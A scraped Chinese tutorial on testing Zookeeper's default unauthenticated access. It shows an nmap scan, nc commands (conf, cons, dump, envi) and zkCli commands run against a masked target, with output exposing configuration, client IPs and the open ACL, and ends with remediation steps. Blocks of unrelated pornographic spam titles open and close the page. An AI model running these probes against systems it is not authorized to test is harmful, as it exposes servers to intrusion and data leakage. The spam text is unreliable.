婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > Zookeeper未授權訪問測試問題

Zookeeper未授權訪問測試問題

熱門標簽:AI電銷機器人 源碼 高德地圖標注論壇 蘭州ai電銷機器人招商 新科美甲店地圖標注 北海市地圖標注app 新邵電銷機器人企業 外呼系統打哪顯哪 江西外呼系統 湖北ai智能電銷機器人

前言

  ZooKeeper是一個分布式的,開放源碼的分布式應用程序協調服務,是Google的Chubby一個開源的實現,是Hadoop和Hbase的重要組件。它是一個為分布式應用提供一致性服務的軟件,提供的功能包括:配置維護、域名服務、分布式同步、組服務等。

  zookeeper 未授權訪問是指安裝部署之后默認情況下不需要任何身份驗證,從而導致 zookeeper 被遠程利用,導致大量服務級別的信息泄露。

  默認使用端口:2181、2182。

探測Zookeeper服務開放

  如使用nmap探測某個目標地址是否運行Zookeeper服務,探測2181端口開放。

root@kali:~# nmap -Pn -p 2181 xx.xx.xx.xx
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-21 01:56 EDT
Nmap scan report for xx.xx.xx.xx.static.sz.js.chinamobile.com (xx.xx.xx.xx)
Host is up (0.016s latency).

PORT   STATE SERVICE
2181/tcp open eforward

Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds

  批量探測僅需修改一下對應的目標地址即可。

獲取信息

conf命令

  輸出相關服務配置的詳細信息,端口、數據路徑、日志路徑、session 超時時間,最大連接數等。

root@kali:~# echo conf | nc xx.xx.xx.xx 2181
clientPort=2171
dataDir=/opt/data/zookeeper/data/version-2
dataLogDir=/opt/data/zookeeper/data/version-2
tickTime=2000
maxClientCnxns=0
minSessionTimeout=4000
maxSessionTimeout=40000
serverId=0

cons命令

  列出所有連接到當前服務器的客戶端/會話的詳細信息。

root@kali:~# echo cons | nc xx.xx.xx.xx 2181 | more
/10.23.46.40:11958[1](queued=0,recved=27317,sent=27317,sid=0x1000000e029b16e,lop=PING,est=1571277639586,to=40000,lcxid=0x33,lzxid=0x286a720,lresp=2435779043,llat=0,minlat=0,avglat=0,maxlat=397)
/10.23.46.39:9688[1](queued=0,recved=27316,sent=27316,sid=0x1000000e029b17c,lop=PING,est=1571277641790,to=40000,lcxid=0x33,lzxid=0x286a71c,lresp=2435777895,llat=0,minlat=0,avglat=0,maxlat=560)

dump命令

  輸出未處理的會話和臨時節點,leader 節點有效。

root@kali:~# echo dump | nc xx.xx.xx.xx 2181 | more
SessionTracker dump:
Session Sets (21):
0 expire at Thu Jan 29 12:38:08 CST 1970:
0 expire at Thu Jan 29 12:38:10 CST 1970:
3 expire at Thu Jan 29 12:38:12 CST 1970:
0x1000000e01f0013
0x1000000e029fdde
0x1000000e029fe05
2 expire at Thu Jan 29 12:38:14 CST 1970:
0x1000000e02a4235
0x1000000e01f00e9
31 expire at Thu Jan 29 12:38:16 CST 1970:
0x1000000e01f067a
0x1000000e02a423c
0x1000000e01f0008
0x1000000e029fdf4
...

  非 leader 節點看不到什么相關信息。

envi命令

  輸出服務器的詳細信息。

root@kali:~# echo envi | nc xx.xx.xx.xx 2181
Environment:
zookeeper.version=3.4.13-2d71af4dbe22557fda74f9a9b4309b15a7487f03, built on 06/29/2018 04:05 GMT
host.name=c1b69852-ac24-11e8-88d9-a4bf01306d06
java.version=1.7.0_80
java.vendor=Oracle Corporation
java.home=/usr/java/jdk1.7.0_80/jre
java.class.path=/opt/midware/zookeeper/bin/../build/classes:/opt/midware/zookeeper/bin/../build/lib/*.jar:/opt/midware/zookeeper/bin/../lib/slf4j-log4j12-1.7.25.jar:/opt/midware/zookeeper/bin/../lib/slf4j-api-1.7.25.jar:/opt/midware/zookeeper/bin/../lib/netty-3.10.6.Final.jar:/opt/midware/zookeeper/bin/../lib/log4j-1.2.17.jar:/opt/midware/zookeeper/bin/../lib/jline-0.9.94.jar:/opt/midware/zookeeper/bin/../lib/audience-annotations-0.5.0.jar:/opt/midware/zookeeper/bin/../zookeeper-3.4.13.jar:/opt/midware/zookeeper/bin/../src/java/lib/*.jar:/opt/midware/zookeeper/bin/../conf:
java.library.path=/usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/lib
java.io.tmpdir=/tmp
java.compiler=<NA>
os.name=Linux
os.arch=amd64
os.version=3.10.0-327.36.3.el7.x86_64
user.name=root
user.home=/root
user.dir=/

連接測試

安裝工具

  如在kali下,可以用如下命令安裝zookeeper工具,之后即可使用客戶端連接工具zkCli.sh。

# apt-get install zookeeper
...
#root@kali:~# cd /usr/share/zookeeper/bin/
#root@kali:/usr/share/zookeeper/bin# ls
zkCleanup.sh zkCli.sh zkEnv.sh zkServer.sh

連接目標

  使用-server參數指定目標即可連接。

root@kali:/usr/share/zookeeper/bin# ./zkCli.sh -server xx.xx.xx.xx:2181
Connecting to xx.xx.xx.xx:2181
Welcome to ZooKeeper!
JLine support is enabled
[zk: xx.xx.xx.xx:2181(CONNECTING) 0]

... 已連接

獲取系統相關信息

root@kali:/usr/share/zookeeper/bin# ./zkCli.sh -server xx.xx.xx.xx:2181
Connecting to xx.xx.xx.xx:2181
Welcome to ZooKeeper!
JLine support is enabled
[zk: xx.xx.xx.xx:2181(CONNECTING) 0]
WATCHER::
WatchedEvent state:SyncConnected type:None path:null
[zk: xx.xx.xx.xx:2181(CONNECTED) 0] ls /
[service, pms, DsMaster, Resource, monitor_lock, zookeeper]
[zk: xx.xx.xx.xx:2181(CONNECTED) 1] get /
cZxid = 0x0
ctime = Wed Dec 31 19:00:00 EST 1969
mZxid = 0x0
mtime = Wed Dec 31 19:00:00 EST 1969
pZxid = 0x4c0
cversion = 4
dataVersion = 0
aclVersion = 0
ephemeralOwner = 0x0
dataLength = 0
numChildren = 6
[zk: xx.xx.xx.xx:2181(CONNECTED) 2] get /service
cZxid = 0x2
ctime = Thu Aug 30 02:58:40 EDT 2018
mZxid = 0x2
mtime = Thu Aug 30 02:58:40 EDT 2018
pZxid = 0x1cb884d
cversion = 7
dataVersion = 0
aclVersion = 0
ephemeralOwner = 0x0
dataLength = 0
numChildren = 3
[zk: xx.xx.xx.xx:2181(CONNECTED) 3] getAcl /
'world,'anyone
: cdrwa

修復方案

1、設置防火墻策略限制 IP 訪問【建議采取此種方案】

2、不要將 zookeeper 暴露在外網

3、設置用戶認證和 ACL

參考

  zookeeper 未授權訪問

     http://vic.pub/zookeeper-未授權訪問/

總結

以上所述是小編給大家介紹的Zookeeper未授權訪問測試問題,希望對大家有所幫助,如果大家有任何疑問請給我留言,小編會及時回復大家的。在此也非常感謝大家對腳本之家網站的支持!
如果你覺得本文對你有幫助,歡迎轉載,煩請注明出處,謝謝!

標簽:池州 自貢 海南 南陽 阿克蘇 黃石 大理 黔東

巨人網絡通訊聲明:本文標題《Zookeeper未授權訪問測試問題》,本文關鍵詞  Zookeeper,未,授權,訪問,測試,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《Zookeeper未授權訪問測試問題》相關的同類信息!
  • 本頁收集關于Zookeeper未授權訪問測試問題的相關信息資訊供網民參考!
  • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    中文字幕精品综合| 日韩福利电影在线观看| 亚洲v日本v欧美v久久精品| 蜜桃在线一区二区三区| 91色综合久久久久婷婷| 日韩精品资源二区在线| 一区二区三区在线播| 国产乱码精品一区二区三区五月婷| 色综合天天做天天爱| 在线播放欧美女士性生活| 欧美三级中文字| 欧美一区二区精品在线| 日韩一区二区三区观看| 欧美精品一区二区三区蜜臀| 精品播放一区二区| 久久精品欧美日韩精品| 亚洲欧美成aⅴ人在线观看| 亚洲同性gay激情无套| 亚洲另类一区二区| 偷拍自拍另类欧美| 国产婷婷色一区二区三区四区| 亚洲欧洲一区二区在线播放| 九九精品视频在线看| 亚洲成人福利片| 一区二区三区av电影| 午夜在线电影亚洲一区| 国产精品免费aⅴ片在线观看| 亚洲午夜久久久久久久久电影网 | 国产成人午夜高潮毛片| 精品少妇一区二区三区日产乱码| 亚洲制服丝袜av| 91成人在线观看喷潮| 亚洲柠檬福利资源导航| 在线看国产一区二区| 一区二区三区高清在线| 欧美在线999| 亚洲高清久久久| 欧美特级限制片免费在线观看| 国产精品色婷婷| 91在线观看一区二区| 亚洲人精品一区| 在线视频欧美精品| 一区二区三区波多野结衣在线观看 | 国产宾馆实践打屁股91| 国产精品久久久久婷婷二区次| 成人理论电影网| 亚洲天堂精品视频| 欧美亚洲国产一区二区三区va| 午夜精品久久久久影视| 7777精品伊人久久久大香线蕉| 奇米四色…亚洲| 国产喂奶挤奶一区二区三区| 北岛玲一区二区三区四区| 亚洲女子a中天字幕| 91麻豆精品国产91久久久资源速度| 丝袜诱惑亚洲看片| 精品国产1区二区| 高清免费成人av| 一卡二卡三卡日韩欧美| 日韩一二三区视频| 福利一区二区在线观看| 亚洲激情男女视频| 欧美成人激情免费网| 粉嫩av一区二区三区在线播放| 国产精品你懂的在线欣赏| 色欧美片视频在线观看| 麻豆精品在线观看| 亚洲日本一区二区| 日韩欧美国产综合| 欧美国产综合一区二区| 色综合久久66| 麻豆精品一区二区| 日韩理论片在线| 久久伊人蜜桃av一区二区| 91久久一区二区| 国产一区欧美日韩| 99久久久久久| 久久久高清一区二区三区| 激情亚洲综合在线| 久久久亚洲精华液精华液精华液| 韩国av一区二区三区| 日韩天堂在线观看| 欧美一级视频精品观看| 韩国v欧美v日本v亚洲v| 亚洲第一激情av| 亚洲视频一二三区| 久久免费国产精品 | 国产精品一线二线三线| 亚洲一区二区综合| 国产精品三级av在线播放| 欧美mv日韩mv| 欧美丰满嫩嫩电影| 欧美午夜精品久久久久久超碰| 国产高清精品在线| 久久精品国产澳门| 亚洲第一搞黄网站| 亚洲国产精品一区二区尤物区| 亚洲欧美影音先锋| 亚洲国产精品二十页| 亚洲精品在线观看视频| 欧美一级理论片| 欧美日韩国产免费一区二区| 91色视频在线| 一本一道久久a久久精品| 国产福利精品一区| 国产成人午夜精品影院观看视频 | 成人福利视频在线| 国产九色sp调教91| 国产乱国产乱300精品| 青草国产精品久久久久久| 亚洲国产日韩a在线播放| 亚洲天堂av老司机| 亚洲精品免费一二三区| 一区二区三区四区乱视频| 亚洲私人影院在线观看| 国产精品护士白丝一区av| 欧美激情自拍偷拍| 中文字幕中文字幕在线一区| 一区二区中文字幕在线| 亚洲人成在线播放网站岛国| 亚洲精品伦理在线| 亚洲第一成年网| 视频一区视频二区中文| 男男gaygay亚洲| 欧美丰满一区二区免费视频| 在线综合视频播放| 日韩精品最新网址| 欧美激情综合网| 樱花影视一区二区| 日本在线不卡视频| 国产一区二区美女诱惑| 99久久久精品| 久久久久久免费网| 欧美xxxx在线观看| 911国产精品| 在线不卡免费欧美| 在线免费观看不卡av| 91在线视频观看| 99久久精品一区| 国产麻豆精品视频| 国产成人免费视频精品含羞草妖精 | 色丁香久综合在线久综合在线观看| 91精品福利视频| 日韩天堂在线观看| 国产精品欧美精品| 五月激情综合网| 粉嫩av一区二区三区在线播放| 色偷偷一区二区三区| 欧美日韩另类一区| 久久久久97国产精华液好用吗| 亚洲特黄一级片| 韩国精品主播一区二区在线观看| 99久久伊人网影院| 欧美喷水一区二区| 国产精品电影院| 日产国产高清一区二区三区| 不卡欧美aaaaa| 日韩免费电影一区| 一区二区三区中文字幕精品精品| 精品一区二区三区久久| 91国偷自产一区二区三区观看 | 欧美一区二区三区思思人| 中文字幕国产一区二区| 无吗不卡中文字幕| 99国产精品国产精品毛片| 欧美精品一区二区三区高清aⅴ| 亚洲一区二区三区国产| 国产成都精品91一区二区三 | 色婷婷av一区二区三区软件| 日韩欧美国产一区二区三区| 亚洲主播在线观看| 99re66热这里只有精品3直播| 日韩一级黄色大片| 香蕉加勒比综合久久| 91色乱码一区二区三区| 国产精品欧美一区喷水| 韩国v欧美v日本v亚洲v| 日韩欧美激情在线| 美洲天堂一区二卡三卡四卡视频 | 国产日韩欧美综合在线| 秋霞电影网一区二区| 欧美性色aⅴ视频一区日韩精品| 国产精品视频你懂的| 国产在线日韩欧美| 精品黑人一区二区三区久久| 亚洲图片欧美色图| 亚洲免费在线视频一区 二区| 国产成人夜色高潮福利影视| 久久久久国产精品厨房| 免费xxxx性欧美18vr| 欧美精品 日韩| 日韩va亚洲va欧美va久久| 欧美视频日韩视频| 亚洲尤物在线视频观看| 色婷婷精品大在线视频| 亚洲va天堂va国产va久| 成人性生交大片免费看中文网站| 欧美日韩亚洲综合| 亚洲欧洲中文日韩久久av乱码| 国产一区二区在线电影|